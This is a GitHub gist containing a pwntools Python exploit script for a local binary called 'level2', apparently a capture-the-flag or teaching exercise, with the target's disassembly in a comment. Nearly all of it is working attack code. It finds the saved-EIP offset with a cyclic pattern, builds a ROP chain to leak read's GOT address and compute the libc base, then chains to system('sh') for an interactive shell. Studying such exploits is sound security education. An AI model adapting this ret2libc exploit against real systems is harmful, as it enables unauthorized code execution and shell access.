Created
June 17, 2016 23:09
-
-
Save zachriggle/0aa94b17b612bd16c14583186ba2212a to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
# Here's the disassembly for everything | |
""" | |
0804844b <vulnerable_function>: | |
804844b: 55 push ebp | |
804844c: 89 e5 mov ebp,esp | |
804844e: 81 ec 88 00 00 00 sub esp,0x88 | |
8048454: 83 ec 04 sub esp,0x4 | |
8048457: 68 00 01 00 00 push 0x100 | |
804845c: 8d 85 78 ff ff ff lea eax,[ebp-0x88] | |
8048462: 50 push eax | |
8048463: 6a 00 push 0x0 | |
8048465: e8 a6 fe ff ff call 8048310 <read@plt> | |
804846a: 83 c4 10 add esp,0x10 | |
804846d: c9 leave | |
804846e: c3 ret | |
0804846f <main>: | |
804846f: 8d 4c 24 04 lea ecx,[esp+0x4] | |
8048473: 83 e4 f0 and esp,0xfffffff0 | |
8048476: ff 71 fc push DWORD PTR [ecx-0x4] | |
8048479: 55 push ebp | |
804847a: 89 e5 mov ebp,esp | |
804847c: 51 push ecx | |
804847d: 83 ec 04 sub esp,0x4 | |
8048480: e8 c6 ff ff ff call 804844b <vulnerable_function> | |
8048485: 83 ec 04 sub esp,0x4 | |
8048488: 6a 0d push 0xd | |
804848a: 68 30 85 04 08 push 0x8048530 | |
804848f: 6a 01 push 0x1 | |
8048491: e8 aa fe ff ff call 8048340 <write@plt> | |
8048496: 83 c4 10 add esp,0x10 | |
8048499: 8b 4d fc mov ecx,DWORD PTR [ebp-0x4] | |
804849c: c9 leave | |
804849d: 8d 61 fc lea esp,[ecx-0x4] | |
80484a0: c3 ret | |
""" | |
# Load the ELF from disk so we can grab libc | |
elf = ELF('./level2') | |
libc = elf.libc | |
# Determine where stack control is by forcing a core dump. | |
io = process('./level2') | |
io.sendline(cyclic(1024)) | |
io.recvall() | |
core = Core('core') | |
eip = cyclic_find(core.eip) | |
log.info("EIP control @ %i" % eip) | |
# Actually exploit the process this time | |
io = process('./level2') | |
# Create a ROP stack to dump the GOT and return to main() | |
# so we can exploit again. | |
rop = ROP(elf) | |
rop.write(1, elf.got['read'], 4) | |
rop.main() | |
print rop.dump() | |
io.send(fit({ | |
eip: str(rop) | |
})) | |
# Get the address of 'read' | |
read = io.unpack() | |
# Adjust libc against that offset | |
libc.address = read - libc.symbols['read'] | |
# Get the address of system(), and build our new ROP stack. | |
system = libc.symbols['system'] | |
binsh = libc.search('sh\x00').next() | |
rop = ROP(libc) | |
rop.system(binsh) | |
# Send the second ROP which gets us a shell. | |
io.send(fit({ | |
eip: str(rop) | |
})) | |
io.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment